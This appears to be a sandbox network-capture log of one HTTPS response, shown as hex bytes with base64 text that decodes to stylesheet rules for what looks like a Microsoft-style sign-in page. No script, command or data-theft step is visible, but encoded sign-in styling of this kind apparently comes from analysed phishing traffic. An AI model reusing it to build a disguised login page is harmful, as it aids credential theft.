                                              2023-09-05 23:45:28 UTC584INData Raw: 31 66 34 30 0d 0a 37 62 57 46 34 4c 57 68 6c 61 57 64 6f 64 44 6f 32 4c 6a 49 77 4e 44 56 79 5a 57 31 39 4c 6e 52 6c 65 48 51 74 59 32 46 77 64 47 6c 76 62 69 78 6f 4e 58 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 4d 54 4a 77 65 44 74 73 61 57 35 6c 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4e 48 42 34 4f 32 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 6a 51 77 4d 44 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 4c 6a 63 31 63 6d 56 74 4f 32 78 70 62 6d 55 74 61 47 56 70 5a 32 68 30 4f 69 34 34 4e 7a 56 79 5a 57 30 37 63 47 46 6b 5a 47 6c 75 5a 79 31 69 62 33 52 30 62 32 30 36 4d 53 34 78 4f 44 45 32 63 48 67 37 63 47 46 6b 5a 47 6c 75 5a 79 31 30 62 33 41 36 4d 53 34 78 4f 44 45 32 63 48 68 39 4c 6e 52 6c 65 48 51 74 59 32 46 77 64 47 6c 76 62 69 35 30 5a 58 68 30
                                              Data Ascii: 1f407bWF4LWhlaWdodDo2LjIwNDVyZW19LnRleHQtY2FwdGlvbixoNXtmb250LXNpemU6MTJweDtsaW5lLWhlaWdodDoxNHB4O2ZvbnQtd2VpZ2h0OjQwMDtmb250LXNpemU6Ljc1cmVtO2xpbmUtaGVpZ2h0Oi44NzVyZW07cGFkZGluZy1ib3R0b206MS4xODE2cHg7cGFkZGluZy10b3A6MS4xODE2cHh9LnRleHQtY2FwdGlvbi50ZXh0
                                              2023-09-05 23:45:28 UTC592INData Raw: 58 68 7a 4c 58 42 31 62 47 77 74 4d 54 6c 37 63 6d 6c 6e 61 48 51 36 4e 7a 6b 75 4d 54 59 32 4e 6a 63 6c 66 53 35 6a 62 32 77 74 65 48 4d 74 63 48 56 73 62 43 30 79 4d 48 74 79 61 57 64 6f 64 44 6f 34 4d 79 34 7a 4d 7a 4d 7a 4d 79 56 39 4c 6d 4e 76 62 43 31 34 63 79 31 77 64 57 78 73 4c 54 49 78 65 33 4a 70 5a 32 68 30 4f 6a 67 33 4c 6a 55 6c 66 53 35 6a 62 32 77 74 65 48 4d 74 63 48 56 73 62 43 30 79 4d 6e 74 79 61 57 64 6f 64 44 6f 35 4d 53 34 32 4e 6a 59 32 4e 79 56 39 4c 6d 4e 76 62 43 31 34 63 79 31 77 64 57 78 73 4c 54 49 7a 65 33 4a 70 5a 32 68 30 4f 6a 6b 31 4c 6a 67 7a 4d 7a 4d 7a 4a 58 30 75 59 32 39 73 4c 58 68 7a 4c 58 42 31 62 47 77 74 4d 6a 52 37 63 6d 6c 6e 61 48 51 36 4d 54 41 77 4a 58 30 75 59 32 39 73 4c 58 68 7a 4c 58 42 31 63 32 67 74
                                              Data Ascii: XhzLXB1bGwtMTl7cmlnaHQ6NzkuMTY2NjclfS5jb2wteHMtcHVsbC0yMHtyaWdodDo4My4zMzMzMyV9LmNvbC14cy1wdWxsLTIxe3JpZ2h0Ojg3LjUlfS5jb2wteHMtcHVsbC0yMntyaWdodDo5MS42NjY2NyV9LmNvbC14cy1wdWxsLTIze3JpZ2h0Ojk1LjgzMzMzJX0uY29sLXhzLXB1bGwtMjR7cmlnaHQ6MTAwJX0uY29sLXhzLXB1c2gt
                                              2023-09-05 23:45:28 UTC600INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:28 UTC600INData Raw: 31 66 34 30 0d 0a 6c 66 53 35 6a 62 32 77 74 62 57 51 74 4d 54 6c 37 64 32 6c 6b 64 47 67 36 4e 7a 6b 75 4d 54 59 32 4e 6a 63 6c 66 53 35 6a 62 32 77 74 62 57 51 74 4d 6a 42 37 64 32 6c 6b 64 47 67 36 4f 44 4d 75 4d 7a 4d 7a 4d 7a 4d 6c 66 53 35 6a 62 32 77 74 62 57 51 74 4d 6a 46 37 64 32 6c 6b 64 47 67 36 4f 44 63 75 4e 53 56 39 4c 6d 4e 76 62 43 31 74 5a 43 30 79 4d 6e 74 33 61 57 52 30 61 44 6f 35 4d 53 34 32 4e 6a 59 32 4e 79 56 39 4c 6d 4e 76 62 43 31 74 5a 43 30 79 4d 33 74 33 61 57 52 30 61 44 6f 35 4e 53 34 34 4d 7a 4d 7a 4d 79 56 39 4c 6d 4e 76 62 43 31 74 5a 43 30 79 4e 48 74 33 61 57 52 30 61 44 6f 78 4d 44 41 6c 66 53 35 6a 62 32 77 74 62 57 51 74 63 48 56 73 62 43 30 77 65 33 4a 70 5a 32 68 30 4f 6d 46 31 64 47 39 39 4c 6d 4e 76 62 43 31 74
                                              Data Ascii: 1f40lfS5jb2wtbWQtMTl7d2lkdGg6NzkuMTY2NjclfS5jb2wtbWQtMjB7d2lkdGg6ODMuMzMzMzMlfS5jb2wtbWQtMjF7d2lkdGg6ODcuNSV9LmNvbC1tZC0yMnt3aWR0aDo5MS42NjY2NyV9LmNvbC1tZC0yM3t3aWR0aDo5NS44MzMzMyV9LmNvbC1tZC0yNHt3aWR0aDoxMDAlfS5jb2wtbWQtcHVsbC0we3JpZ2h0OmF1dG99LmNvbC1t
                                              2023-09-05 23:45:28 UTC608INData Raw: 48 74 6d 62 47 39 68 64 44 70 73 5a 57 5a 30 66 53 35 6a 62 32 77 74 65 47 77 74 4d 58 74 33 61 57 52 30 61 44 6f 30 4c 6a 45 32 4e 6a 59 33 4a 58 30 75 59 32 39 73 4c 58 68 73 4c 54 4a 37 64 32 6c 6b 64 47 67 36 4f 43 34 7a 4d 7a 4d 7a 4d 79 56 39 4c 6d 4e 76 62 43 31 34 62 43 30 7a 65 33 64 70 5a 48 52 6f 4f 6a 45 79 4c 6a 55 6c 66 53 35 6a 62 32 77 74 65 47 77 74 4e 48 74 33 61 57 52 30 61 44 6f 78 4e 69 34 32 4e 6a 59 32 4e 79 56 39 4c 6d 4e 76 62 43 31 34 62 43 30 31 65 33 64 70 5a 48 52 6f 4f 6a 49 77 4c 6a 67 7a 4d 7a 4d 7a 4a 58 30 75 59 32 39 73 4c 58 68 73 4c 54 5a 37 64 32 6c 6b 64 47 67 36 4d 6a 55 6c 66 53 35 6a 62 32 77 74 65 47 77 74 4e 33 74 33 61 57 52 30 61 44 6f 79 4f 53 34 78 4e 6a 59 32 4e 79 56 39 4c 6d 4e 76 62 43 31 34 62 43 30 34
                                              Data Ascii: HtmbG9hdDpsZWZ0fS5jb2wteGwtMXt3aWR0aDo0LjE2NjY3JX0uY29sLXhsLTJ7d2lkdGg6OC4zMzMzMyV9LmNvbC14bC0ze3dpZHRoOjEyLjUlfS5jb2wteGwtNHt3aWR0aDoxNi42NjY2NyV9LmNvbC14bC01e3dpZHRoOjIwLjgzMzMzJX0uY29sLXhsLTZ7d2lkdGg6MjUlfS5jb2wteGwtN3t3aWR0aDoyOS4xNjY2NyV9LmNvbC14bC04
                                              2023-09-05 23:45:28 UTC616INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:28 UTC616INData Raw: 31 66 34 30 0d 0a 69 5a 47 46 30 5a 58 52 70 62 57 55 69 58 54 6f 36 4c 57 31 76 65 69 31 77 62 47 46 6a 5a 57 68 76 62 47 52 6c 63 69 78 70 62 6e 42 31 64 46 74 30 65 58 42 6c 50 53 4a 6b 59 58 52 6c 64 47 6c 74 5a 53 31 73 62 32 4e 68 62 43 4a 64 4f 6a 6f 74 62 57 39 36 4c 58 42 73 59 57 4e 6c 61 47 39 73 5a 47 56 79 4c 47 6c 75 63 48 56 30 57 33 52 35 63 47 55 39 49 6d 56 74 59 57 6c 73 49 6c 30 36 4f 69 31 74 62 33 6f 74 63 47 78 68 59 32 56 6f 62 32 78 6b 5a 58 49 73 61 57 35 77 64 58 52 62 64 48 6c 77 5a 54 30 69 62 57 39 75 64 47 67 69 58 54 6f 36 4c 57 31 76 65 69 31 77 62 47 46 6a 5a 57 68 76 62 47 52 6c 63 69 78 70 62 6e 42 31 64 46 74 30 65 58 42 6c 50 53 4a 75 64 57 31 69 5a 58 49 69 58 54 6f 36 4c 57 31 76 65 69 31 77 62 47 46 6a 5a 57 68 76
                                              Data Ascii: 1f40iZGF0ZXRpbWUiXTo6LW1vei1wbGFjZWhvbGRlcixpbnB1dFt0eXBlPSJkYXRldGltZS1sb2NhbCJdOjotbW96LXBsYWNlaG9sZGVyLGlucHV0W3R5cGU9ImVtYWlsIl06Oi1tb3otcGxhY2Vob2xkZXIsaW5wdXRbdHlwZT0ibW9udGgiXTo6LW1vei1wbGFjZWhvbGRlcixpbnB1dFt0eXBlPSJudW1iZXIiXTo6LW1vei1wbGFjZWhv
                                              2023-09-05 23:45:28 UTC624INData Raw: 47 56 6a 61 33 74 6a 62 32 78 76 63 6a 70 79 5a 32 4a 68 4b 44 41 73 4d 43 77 77 4c 44 41 75 4d 69 6b 67 49 57 6c 74 63 47 39 79 64 47 46 75 64 48 31 70 62 6e 42 31 64 46 74 30 65 58 42 6c 50 53 4a 6a 61 47 56 6a 61 32 4a 76 65 43 4a 64 65 33 64 70 5a 48 52 6f 4f 6a 49 77 63 48 67 37 61 47 56 70 5a 32 68 30 4f 6a 49 77 63 48 68 39 61 57 35 77 64 58 52 62 64 48 6c 77 5a 54 30 69 59 32 68 6c 59 32 74 69 62 33 67 69 58 54 6f 36 4c 57 31 7a 4c 57 4e 6f 5a 57 4e 72 65 32 4a 76 63 6d 52 6c 63 69 31 7a 64 48 6c 73 5a 54 70 7a 62 32 78 70 5a 44 74 69 62 33 4a 6b 5a 58 49 74 64 32 6c 6b 64 47 67 36 4d 6e 42 34 4f 32 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 59 32 39 73 62 33 49 36 64 48 4a 68 62 6e 4e 77 59 58 4a 6c 62 6e 51 37 59 32 39 73 62 33 49 36 49 7a 41 77
                                              Data Ascii: GVja3tjb2xvcjpyZ2JhKDAsMCwwLDAuMikgIWltcG9ydGFudH1pbnB1dFt0eXBlPSJjaGVja2JveCJde3dpZHRoOjIwcHg7aGVpZ2h0OjIwcHh9aW5wdXRbdHlwZT0iY2hlY2tib3giXTo6LW1zLWNoZWNre2JvcmRlci1zdHlsZTpzb2xpZDtib3JkZXItd2lkdGg6MnB4O2JhY2tncm91bmQtY29sb3I6dHJhbnNwYXJlbnQ7Y29sb3I6IzAw
                                              2023-09-05 23:45:28 UTC631INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:29 UTC631INData Raw: 31 66 34 30 0d 0a 68 62 6e 4e 77 59 58 4a 6c 62 6e 51 67 49 57 6c 74 63 47 39 79 64 47 46 75 64 44 74 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 47 39 79 4f 6e 4a 6e 59 6d 45 6f 4d 43 77 77 4c 44 41 73 4d 43 34 79 4b 53 41 68 61 57 31 77 62 33 4a 30 59 57 35 30 66 57 45 75 59 6e 52 75 4f 6d 78 70 62 6d 73 73 59 53 35 69 64 47 34 36 64 6d 6c 7a 61 58 52 6c 5a 48 74 6a 62 32 78 76 63 6a 6f 6a 4d 44 41 77 66 57 45 75 59 6e 52 75 4c 6d 4a 30 62 69 31 77 63 6d 6c 74 59 58 4a 35 4f 6d 78 70 62 6d 73 73 59 53 35 69 64 47 34 75 59 6e 52 75 4c 58 42 79 61 57 31 68 63 6e 6b 36 64 6d 6c 7a 61 58 52 6c 5a 48 74 6a 62 32 78 76 63 6a 6f 6a 5a 6d 5a 6d 66 53 35 77 5a 58 4a 7a 62 32 35 37 59 6d 39 79 5a 47 56 79 4c 58 4a 68 5a 47 6c 31 63 7a 6f 31 4d 43 55 37
                                              Data Ascii: 1f40hbnNwYXJlbnQgIWltcG9ydGFudDtiYWNrZ3JvdW5kLWNvbG9yOnJnYmEoMCwwLDAsMC4yKSAhaW1wb3J0YW50fWEuYnRuOmxpbmssYS5idG46dmlzaXRlZHtjb2xvcjojMDAwfWEuYnRuLmJ0bi1wcmltYXJ5OmxpbmssYS5idG4uYnRuLXByaW1hcnk6dmlzaXRlZHtjb2xvcjojZmZmfS5wZXJzb257Ym9yZGVyLXJhZGl1czo1MCU7
                                              2023-09-05 23:45:29 UTC639INData Raw: 57 64 6f 64 44 6f 7a 4c 6a 63 33 4f 44 4d 34 63 6d 56 74 66 53 35 7a 5a 57 4e 30 61 57 39 75 4c 6d 6c 30 5a 57 30 74 63 32 56 6a 64 47 6c 76 62 69 41 75 63 32 56 6a 64 47 6c 76 62 69 31 30 61 58 52 73 5a 53 35 30 5a 58 68 30 4c 57 31 68 65 47 78 70 62 6d 56 7a 4c 54 52 37 62 57 46 34 4c 57 68 6c 61 57 64 6f 64 44 6f 34 4d 43 34 30 4e 54 52 77 65 44 74 74 59 58 67 74 61 47 56 70 5a 32 68 30 4f 6a 55 75 4d 44 49 34 4d 7a 68 79 5a 57 31 39 4c 6d 4e 68 63 6d 56 30 65 32 52 70 63 33 42 73 59 58 6b 36 61 57 35 73 61 57 35 6c 4c 57 4a 73 62 32 4e 72 4f 33 64 70 5a 48 52 6f 4f 6a 41 37 61 47 56 70 5a 32 68 30 4f 6a 41 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a 6e 51 36 4d 6e 42 34 4f 33 5a 6c 63 6e 52 70 59 32 46 73 4c 57 46 73 61 57 64 75 4f 6d 31 70 5a 47 52 73
                                              Data Ascii: WdodDozLjc3ODM4cmVtfS5zZWN0aW9uLml0ZW0tc2VjdGlvbiAuc2VjdGlvbi10aXRsZS50ZXh0LW1heGxpbmVzLTR7bWF4LWhlaWdodDo4MC40NTRweDttYXgtaGVpZ2h0OjUuMDI4MzhyZW19LmNhcmV0e2Rpc3BsYXk6aW5saW5lLWJsb2NrO3dpZHRoOjA7aGVpZ2h0OjA7bWFyZ2luLWxlZnQ6MnB4O3ZlcnRpY2FsLWFsaWduOm1pZGRs
                                              2023-09-05 23:45:29 UTC647INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:29 UTC647INData Raw: 31 66 34 30 0d 0a 75 4f 6e 4a 6c 62 47 46 30 61 58 5a 6c 66 53 35 74 62 32 52 68 62 43 31 6d 62 32 39 30 5a 58 49 36 59 6d 56 6d 62 33 4a 6c 4c 43 35 74 62 32 52 68 62 43 31 6d 62 32 39 30 5a 58 49 36 59 57 5a 30 5a 58 4a 37 59 32 39 75 64 47 56 75 64 44 6f 69 49 43 49 37 5a 47 6c 7a 63 47 78 68 65 54 70 30 59 57 4a 73 5a 58 30 75 62 57 39 6b 59 57 77 74 5a 6d 39 76 64 47 56 79 4f 6d 46 6d 64 47 56 79 65 32 4e 73 5a 57 46 79 4f 6d 4a 76 64 47 68 39 4c 6d 31 76 5a 47 46 73 4c 58 4e 6a 63 6d 39 73 62 47 4a 68 63 69 31 74 5a 57 46 7a 64 58 4a 6c 65 33 42 76 63 32 6c 30 61 57 39 75 4f 6d 46 69 63 32 39 73 64 58 52 6c 4f 33 52 76 63 44 6f 74 4f 54 6b 35 4f 58 42 34 4f 33 64 70 5a 48 52 6f 4f 6a 55 77 63 48 67 37 61 47 56 70 5a 32 68 30 4f 6a 55 77 63 48 67 37
                                              Data Ascii: 1f40uOnJlbGF0aXZlfS5tb2RhbC1mb290ZXI6YmVmb3JlLC5tb2RhbC1mb290ZXI6YWZ0ZXJ7Y29udGVudDoiICI7ZGlzcGxheTp0YWJsZX0ubW9kYWwtZm9vdGVyOmFmdGVye2NsZWFyOmJvdGh9Lm1vZGFsLXNjcm9sbGJhci1tZWFzdXJle3Bvc2l0aW9uOmFic29sdXRlO3RvcDotOTk5OXB4O3dpZHRoOjUwcHg7aGVpZ2h0OjUwcHg7
                                              2023-09-05 23:45:29 UTC655INData Raw: 32 78 70 49 69 77 69 54 58 6c 68 62 6d 31 68 63 69 42 55 5a 58 68 30 49 69 77 69 51 32 46 74 59 6e 4a 70 59 53 42 4e 59 58 52 6f 49 6e 30 75 53 55 56 66 54 54 63 67 64 57 78 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a 6e 51 36 4d 48 30 75 53 55 56 66 54 54 63 67 61 57 35 77 64 58 52 62 64 48 6c 77 5a 54 30 69 59 6e 56 30 64 47 39 75 49 6c 30 73 4c 6b 6c 46 58 30 30 33 49 47 6c 75 63 48 56 30 57 33 52 35 63 47 55 39 49 6e 4e 31 59 6d 31 70 64 43 4a 64 4c 43 35 4a 52 56 39 4e 4e 79 42 69 64 58 52 30 62 32 34 73 4c 6b 6c 46 58 30 30 33 49 47 6c 75 63 48 56 30 57 33 52 35 63 47 55 39 49 6d 4a 31 64 48 52 76 62 69 4a 64 4c 6d 4a 30 62 69 77 75 53 55 56 66 54 54 63 67 61 57 35 77 64 58 52 62 64 48 6c 77 5a 54 30 69 63 33 56 69 62 57 6c 30 49 6c 30 75 59 6e 52 75
                                              Data Ascii: 2xpIiwiTXlhbm1hciBUZXh0IiwiQ2FtYnJpYSBNYXRoIn0uSUVfTTcgdWx7bWFyZ2luLWxlZnQ6MH0uSUVfTTcgaW5wdXRbdHlwZT0iYnV0dG9uIl0sLklFX003IGlucHV0W3R5cGU9InN1Ym1pdCJdLC5JRV9NNyBidXR0b24sLklFX003IGlucHV0W3R5cGU9ImJ1dHRvbiJdLmJ0biwuSUVfTTcgaW5wdXRbdHlwZT0ic3VibWl0Il0uYnRu
                                              2023-09-05 23:45:29 UTC663INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:29 UTC663INData Raw: 31 66 34 30 0d 0a 37 62 33 42 68 59 32 6c 30 65 54 6f 78 66 54 4d 31 4a 58 74 73 5a 57 5a 30 4f 6a 51 31 4a 54 73 74 62 79 31 68 62 6d 6c 74 59 58 52 70 62 32 34 74 64 47 6c 74 61 57 35 6e 4c 57 5a 31 62 6d 4e 30 61 57 39 75 4f 6d 78 70 62 6d 56 68 63 6e 30 32 4e 53 56 37 62 47 56 6d 64 44 6f 32 4d 43 55 37 4c 57 38 74 59 57 35 70 62 57 46 30 61 57 39 75 4c 58 52 70 62 57 6c 75 5a 79 31 6d 64 57 35 6a 64 47 6c 76 62 6a 70 6c 59 58 4e 6c 4c 57 6c 75 66 54 63 31 4a 58 74 76 63 47 46 6a 61 58 52 35 4f 6a 46 39 4f 44 41 6c 4c 44 45 77 4d 43 56 37 62 47 56 6d 64 44 6f 78 4d 44 41 6c 4f 32 39 77 59 57 4e 70 64 48 6b 36 4d 48 31 39 51 47 74 6c 65 57 5a 79 59 57 31 6c 63 79 42 77 63 6d 39 6e 63 6d 56 7a 63 30 52 76 64 48 73 77 4a 53 77 79 4d 43 56 37 62 47 56 6d
                                              Data Ascii: 1f407b3BhY2l0eToxfTM1JXtsZWZ0OjQ1JTstby1hbmltYXRpb24tdGltaW5nLWZ1bmN0aW9uOmxpbmVhcn02NSV7bGVmdDo2MCU7LW8tYW5pbWF0aW9uLXRpbWluZy1mdW5jdGlvbjplYXNlLWlufTc1JXtvcGFjaXR5OjF9ODAlLDEwMCV7bGVmdDoxMDAlO29wYWNpdHk6MH19QGtleWZyYW1lcyBwcm9ncmVzc0RvdHswJSwyMCV7bGVm
                                              2023-09-05 23:45:29 UTC671INData Raw: 47 78 70 64 43 31 74 59 57 6c 75 4c 58 4e 6c 59 33 52 70 62 32 34 67 4c 6d 4a 76 61 57 78 6c 63 6e 42 73 59 58 52 6c 4c 58 52 6c 65 48 51 73 4c 6e 5a 6c 63 6e 52 70 59 32 46 73 4c 58 4e 77 62 47 6c 30 4c 57 31 68 61 57 34 74 63 32 56 6a 64 47 6c 76 62 69 41 75 59 6d 39 70 62 47 56 79 63 47 78 68 64 47 55 74 64 47 56 34 64 43 35 30 63 6d 46 75 63 33 42 68 63 6d 56 75 64 43 31 73 61 57 64 6f 64 47 4a 76 65 48 74 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 47 39 79 4f 6e 52 79 59 57 35 7a 63 47 46 79 5a 57 35 30 66 53 35 32 5a 58 4a 30 61 57 4e 68 62 43 31 73 61 57 64 6f 64 47 4a 76 65 43 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 64 32 6c 6b 64 47 67 36 4e 54 41 77 63 48 68 39 4c 6e 5a 6c 63 6e 52 70 59 32 46 73 4c 57 78 70 5a 32 68 30 59 6d 39 34
                                              Data Ascii: GxpdC1tYWluLXNlY3Rpb24gLmJvaWxlcnBsYXRlLXRleHQsLnZlcnRpY2FsLXNwbGl0LW1haW4tc2VjdGlvbiAuYm9pbGVycGxhdGUtdGV4dC50cmFuc3BhcmVudC1saWdodGJveHtiYWNrZ3JvdW5kLWNvbG9yOnRyYW5zcGFyZW50fS52ZXJ0aWNhbC1saWdodGJveC1jb250YWluZXJ7d2lkdGg6NTAwcHh9LnZlcnRpY2FsLWxpZ2h0Ym94
                                              2023-09-05 23:45:29 UTC678INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:29 UTC678INData Raw: 31 66 34 30 0d 0a 6d 5a 6a 74 69 62 33 4a 6b 5a 58 49 74 64 32 6c 6b 64 47 67 36 4d 44 74 69 62 33 4a 6b 5a 58 49 74 63 6d 46 6b 61 58 56 7a 4f 6a 45 79 63 48 67 37 62 57 46 79 5a 32 6c 75 4c 58 4a 70 5a 32 68 30 4f 6a 4a 77 65 48 30 75 59 6d 46 6a 61 30 4a 31 64 48 52 76 62 6a 70 6f 62 33 5a 6c 63 6e 74 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 47 39 79 4f 69 4e 6c 4e 6d 55 32 5a 54 59 37 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 6a 62 32 78 76 63 6a 70 79 5a 32 4a 68 4b 44 41 73 4d 43 77 77 4c 44 41 75 4d 53 6c 39 4c 6d 4a 68 59 32 74 43 64 58 52 30 62 32 34 36 61 47 39 32 5a 58 49 36 5a 6d 39 6a 64 58 4e 37 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 6a 62 32 78 76 63 6a 6f 6a 59 32 4e 6a 4f 32 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74
                                              Data Ascii: 1f40mZjtib3JkZXItd2lkdGg6MDtib3JkZXItcmFkaXVzOjEycHg7bWFyZ2luLXJpZ2h0OjJweH0uYmFja0J1dHRvbjpob3ZlcntiYWNrZ3JvdW5kLWNvbG9yOiNlNmU2ZTY7YmFja2dyb3VuZC1jb2xvcjpyZ2JhKDAsMCwwLDAuMSl9LmJhY2tCdXR0b246aG92ZXI6Zm9jdXN7YmFja2dyb3VuZC1jb2xvcjojY2NjO2JhY2tncm91bmQt
                                              2023-09-05 23:45:29 UTC686INData Raw: 58 4a 30 61 57 4e 68 62 43 31 7a 63 47 78 70 64 43 31 6a 62 32 35 30 5a 57 35 30 4c 6d 46 77 63 48 74 74 61 57 34 74 64 32 6c 6b 64 47 67 36 4d 7a 41 30 63 48 67 37 64 32 6c 6b 64 47 67 36 59 32 46 73 59 79 67 78 4d 44 42 32 64 79 41 74 49 44 45 32 63 48 67 70 66 53 35 70 62 6d 35 6c 63 69 35 68 63 48 41 73 4c 6e 4e 70 5a 32 34 74 61 57 34 74 59 6d 39 34 4c 6d 46 77 63 43 77 75 64 6d 56 79 64 47 6c 6a 59 57 77 74 63 33 42 73 61 58 51 74 59 32 39 75 64 47 56 75 64 43 35 68 63 48 42 37 4c 58 64 6c 59 6d 74 70 64 43 31 69 62 33 67 74 63 32 68 68 5a 47 39 33 4f 6a 41 67 4d 6e 42 34 49 44 5a 77 65 43 42 79 5a 32 4a 68 4b 44 41 73 4d 43 77 77 4c 44 41 75 4d 69 6b 37 4c 57 31 76 65 69 31 69 62 33 67 74 63 32 68 68 5a 47 39 33 4f 6a 41 67 4d 6e 42 34 49 44 5a 77
                                              Data Ascii: XJ0aWNhbC1zcGxpdC1jb250ZW50LmFwcHttaW4td2lkdGg6MzA0cHg7d2lkdGg6Y2FsYygxMDB2dyAtIDE2cHgpfS5pbm5lci5hcHAsLnNpZ24taW4tYm94LmFwcCwudmVydGljYWwtc3BsaXQtY29udGVudC5hcHB7LXdlYmtpdC1ib3gtc2hhZG93OjAgMnB4IDZweCByZ2JhKDAsMCwwLDAuMik7LW1vei1ib3gtc2hhZG93OjAgMnB4IDZw
                                              2023-09-05 23:45:29 UTC694INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:29 UTC694INData Raw: 31 66 34 30 0d 0a 4e 61 57 4e 79 62 33 4e 76 5a 6e 51 67 53 47 6c 74 59 57 78 68 65 57 45 69 4c 43 4a 4e 61 57 4e 79 62 33 4e 76 5a 6e 51 67 54 6d 56 33 49 46 52 68 61 53 42 4d 64 57 55 69 4c 43 4a 4e 61 57 4e 79 62 33 4e 76 5a 6e 51 67 55 47 68 68 5a 33 4e 51 59 53 49 73 49 6b 31 70 59 33 4a 76 63 32 39 6d 64 43 42 55 59 57 6b 67 54 47 55 69 4c 43 4a 4e 61 57 4e 79 62 33 4e 76 5a 6e 51 67 57 57 6b 67 51 6d 46 70 64 47 6b 69 4c 43 4a 4e 62 32 35 6e 62 32 78 70 59 57 34 67 51 6d 46 70 64 47 6b 69 4c 43 4a 4e 56 69 42 43 62 32 78 70 49 69 77 69 54 58 6c 68 62 6d 31 68 63 69 42 55 5a 58 68 30 49 69 77 69 51 32 46 74 59 6e 4a 70 59 53 42 4e 59 58 52 6f 49 6e 30 75 64 47 6c 30 62 47 56 37 62 57 46 79 5a 32 6c 75 4c 57 4a 76 64 48 52 76 62 54 6f 79 4d 48 42 34
                                              Data Ascii: 1f40NaWNyb3NvZnQgSGltYWxheWEiLCJNaWNyb3NvZnQgTmV3IFRhaSBMdWUiLCJNaWNyb3NvZnQgUGhhZ3NQYSIsIk1pY3Jvc29mdCBUYWkgTGUiLCJNaWNyb3NvZnQgWWkgQmFpdGkiLCJNb25nb2xpYW4gQmFpdGkiLCJNViBCb2xpIiwiTXlhbm1hciBUZXh0IiwiQ2FtYnJpYSBNYXRoIn0udGl0bGV7bWFyZ2luLWJvdHRvbToyMHB4
                                              2023-09-05 23:45:29 UTC702INData Raw: 6e 56 30 64 47 39 75 4c 6e 4e 6c 59 32 39 75 5a 47 46 79 65 53 78 70 62 6e 42 31 64 46 74 30 65 58 42 6c 50 53 64 69 64 58 52 30 62 32 34 6e 58 53 35 7a 5a 57 4e 76 62 6d 52 68 63 6e 6b 73 61 57 35 77 64 58 52 62 64 48 6c 77 5a 54 30 6e 63 33 56 69 62 57 6c 30 4a 31 30 75 63 32 56 6a 62 32 35 6b 59 58 4a 35 4c 47 6c 75 63 48 56 30 57 33 52 35 63 47 55 39 4a 33 4a 6c 63 32 56 30 4a 31 30 75 63 32 56 6a 62 32 35 6b 59 58 4a 35 4c 43 35 69 64 47 34 75 59 6e 52 75 4c 57 64 76 62 32 64 73 5a 53 35 7a 5a 57 4e 76 62 6d 52 68 63 6e 6c 37 62 33 56 30 62 47 6c 75 5a 54 6f 78 63 48 67 67 63 32 39 73 61 57 51 67 61 47 6c 6e 61 47 78 70 5a 32 68 30 4f 32 4a 76 63 6d 52 6c 63 6a 6f 78 63 48 67 67 63 32 39 73 61 57 51 67 61 47 6c 6e 61 47 78 70 5a 32 68 30 4f 32 4a 68
                                              Data Ascii: nV0dG9uLnNlY29uZGFyeSxpbnB1dFt0eXBlPSdidXR0b24nXS5zZWNvbmRhcnksaW5wdXRbdHlwZT0nc3VibWl0J10uc2Vjb25kYXJ5LGlucHV0W3R5cGU9J3Jlc2V0J10uc2Vjb25kYXJ5LC5idG4uYnRuLWdvb2dsZS5zZWNvbmRhcnl7b3V0bGluZToxcHggc29saWQgaGlnaGxpZ2h0O2JvcmRlcjoxcHggc29saWQgaGlnaGxpZ2h0O2Jh
                                              2023-09-05 23:45:29 UTC709INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:29 UTC709INData Raw: 31 66 34 30 0d 0a 72 61 58 51 74 59 57 35 70 62 57 46 30 61 57 39 75 4c 57 35 68 62 57 55 36 63 32 68 76 64 79 31 6d 63 6d 39 74 4c 58 4a 70 5a 32 68 30 4f 79 31 74 62 33 6f 74 59 57 35 70 62 57 46 30 61 57 39 75 4c 57 35 68 62 57 55 36 63 32 68 76 64 79 31 6d 63 6d 39 74 4c 58 4a 70 5a 32 68 30 4f 79 31 74 63 79 31 68 62 6d 6c 74 59 58 52 70 62 32 34 74 62 6d 46 74 5a 54 70 7a 61 47 39 33 4c 57 5a 79 62 32 30 74 63 6d 6c 6e 61 48 51 37 4c 57 38 74 59 57 35 70 62 57 46 30 61 57 39 75 4c 57 35 68 62 57 55 36 63 32 68 76 64 79 31 6d 63 6d 39 74 4c 58 4a 70 5a 32 68 30 66 57 68 30 62 57 78 62 5a 47 6c 79 50 57 78 30 63 6c 30 67 4c 6d 46 75 61 57 31 68 64 47 55 75 63 32 78 70 5a 47 55 74 62 33 56 30 4c 57 4a 68 59 32 73 73 61 48 52 74 62 46 74 6b 61 58 49 39
                                              Data Ascii: 1f40raXQtYW5pbWF0aW9uLW5hbWU6c2hvdy1mcm9tLXJpZ2h0Oy1tb3otYW5pbWF0aW9uLW5hbWU6c2hvdy1mcm9tLXJpZ2h0Oy1tcy1hbmltYXRpb24tbmFtZTpzaG93LWZyb20tcmlnaHQ7LW8tYW5pbWF0aW9uLW5hbWU6c2hvdy1mcm9tLXJpZ2h0fWh0bWxbZGlyPWx0cl0gLmFuaW1hdGUuc2xpZGUtb3V0LWJhY2ssaHRtbFtkaXI9
